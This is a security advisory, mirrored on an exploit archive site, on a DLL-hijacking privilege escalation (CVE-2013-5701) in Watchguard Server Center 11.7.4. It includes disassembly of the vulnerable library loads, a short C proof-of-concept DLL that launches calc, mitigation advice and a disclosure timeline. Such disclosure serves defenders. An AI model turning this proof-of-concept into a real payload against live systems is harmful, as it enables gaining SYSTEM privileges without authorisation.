what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Watchguard Server Center 11.7.4 Insecure Library Loading

Watchguard Server Center 11.7.4 Insecure Library Loading
Posted Sep 9, 2013
Authored by Julien Ahrens | Site rcesecurity.com

Watchguard Server Center version 11.7.4 suffers from a dll hijacking vulnerability with wgpr.dll.

tags | exploit
systems | windows
advisories | CVE-2013-5701
SHA-256 | b67a720d0a797532d0f3e4fea6a5b7cd8823f0a69b548c11cca0352f1007db8e

Watchguard Server Center 11.7.4 Insecure Library Loading

Change Mirror Download
Watchguard Server Center v11.7.4 wgpr.dll Insecure Library Loading Local
Privilege Escalation Vulnerability

RCE Security Advisory
http://www.rcesecurity.com


1. ADVISORY INFORMATION
-----------------------
Product: Watchguard Server Center
Vendor URL: www.watchguard.com
Type: Uncontrolled Search Path Element [CWE-427]
Date found: 2013-07-29
Date published: 2013-08-09
CVSSv2 Score: 6,6 (AV:L/AC:M/Au:S/C:C/I:C/A:C)
CVE: CVE-2013-5701


2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.


3. VERSIONS AFFECTED
--------------------
Watchguard Server Center v11.7.4
Watchguard Server Center v11.7.3
and other older versions may be affected too.


4. VULNERABILITY DESCRIPTION
----------------------------
An insecure library loading vulnerability has been identified in different
components of the Watchguard Server Center v11.7.4.

The application installs two services "Watchguard Log Collector"
(%installdir%\wsm11\wlcollector\bin\wlcollector.exe)
and "Watchguard WebBlocker Server"
(%installdir%\wsm11\wbserver\bin\wbserver.exe).

Both application services use a fixed path to look for specific files or
libraries. This path includes directories that may not be trusted or under
user control.

By placing a custom version of a library in the application path, the
program will load it before the legitimate version. This allows an attacker
to inject custom code that will be run with the privilege of the program or
user executing the program. The following libraries could be hijacked on
this way:

wgpr.dll

Since both services are running using the SYSTEM account, this may allow a
less privileged user to gain access to SYSTEM privileges. A local attacker
or compromised process is able to put a malicious application library into
the directory which will be executed after a service restart.

On a default installation (%programfiles%\Watchguard) of the Watchguard
Server Center on Windows Vista and above the directory permissions disallow
an low-privileged attacker to mount the attack.

On a default installation (%programfiles%\Watchguard) of the Watchguard
Server Center on Windows XP, the attacker needs to have at least Power User
rights to successfully mount the attack.

On a non-default installation of the Watchguard Server Center to a
directory, which is writeable by a low-privileged user, the attack can be
mounted successfully without any restrictions.


5. DEBUG INFORMATION
--------------------
The vulnerable code part of wlcollector.exe:

00401691 MOV EDI,DWORD PTR DS:[<&KERNEL32.LoadLib>; kernel32.LoadLibraryA
00401697 MOV ESI,EAX
00401699 TEST ESI,ESI
0040169B JE SHORT wlcollec.004016B3
0040169D PUSH wlcollec.00409320 ; /ProcNameOrOrdinal
004016A2 PUSH wlcollec.00409310 ; |/FileName = "kernel32.dll"
004016A7 CALL EDI ; |\LoadLibraryA
004016A9 PUSH EAX ; |hModule
004016AA CALL EBX ; \GetProcAddress
004016AC TEST EAX,EAX
004016AE JE SHORT wlcollec.004016B3
004016B0 PUSH ESI
004016B1 CALL EAX
004016B3 PUSH wlcollec.00409304 ; ASCII "wgpr.dll"
004016B8 CALL EDI ; kernel32.LoadLibraryA

The vulnerable code part of wbserver.exe

00401041 MOV EDI,DWORD PTR DS:[<&KERNEL32.LoadLib>; kernel32.LoadLibraryA
00401047 MOV ESI,EAX
00401049 TEST ESI,ESI
0040104B JE SHORT wbserver.00401063
0040104D PUSH wbserver.00408284 ; /ProcNameOrOrdinal
00401052 PUSH wbserver.00408274 ; |/FileName = "kernel32.dll"
00401057 CALL EDI ; |\LoadLibraryA
00401059 PUSH EAX ; |hModule
0040105A CALL EBX ; \GetProcAddress
0040105C TEST EAX,EAX
0040105E JE SHORT wbserver.00401063
00401060 PUSH ESI
00401061 CALL EAX
00401063 PUSH wbserver.00408268 ; ASCII "wgpr.dll"
00401068 CALL EDI


6. PROOF-OF-CONCEPT (CODE / EXPLOIT)
------------------------------------
Use the following code to exploit the vulnerability:

#include <windows.h>

#define DLL_EXPORT __declspec(dllexport)

#ifdef __cplusplus
extern "C"
{
#endif

void DLL_EXPORT wgpr_library_get()
{
WinExec("calc",0);
}

#ifdef __cplusplus
}
#endif


6. SOLUTION
-----------
Administrators who installed the Watchguard Server Center on WinXP or
outside the default installation folder, should harden the directories
permissions (administrative write permissions only) on the mentioned
folders to lower the attack risk.


7. REPORT TIMELINE
------------------
2013-07-29: Discovery of the vulnerability
2013-07-30: RCE Security sends first notification to Customer Care via mail
with disclosure date set to 13. August 2013
2013-08-05: RCE Security sends second notification using Twitter
2013-08-05: Response from vendor
2013-08-05: RCE Security sends vulnerability details to vendor
2013-08-05: Vendor ACKs the issue and asks for an extension of 30 days
2013-08-06: New disclosure date set to 13. September 2013
2013-08-06: Vendor assigns bug id #75251
2013-08-19: No further status updates received according to disclosure
policy, asking for status update
2013-08-19: Vendor estimates the risk of the issue as "extremely limited",
and therefor ACKs the public disclosure
2013-08-28: Vendor plans to release the fix with the next major release in
around Q4
2013-09-05: MITRE assigns CVE-2013-5701 for this issue
2013-09-08: Full Disclosure


8. REFERENCES
-------------
https://www.rcesecurity.com/2013/09/cve-2013-5701-watchguard-server-center-v11-7-4-wgpr-dll-local-privileges-escalation-vulnerability/


Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close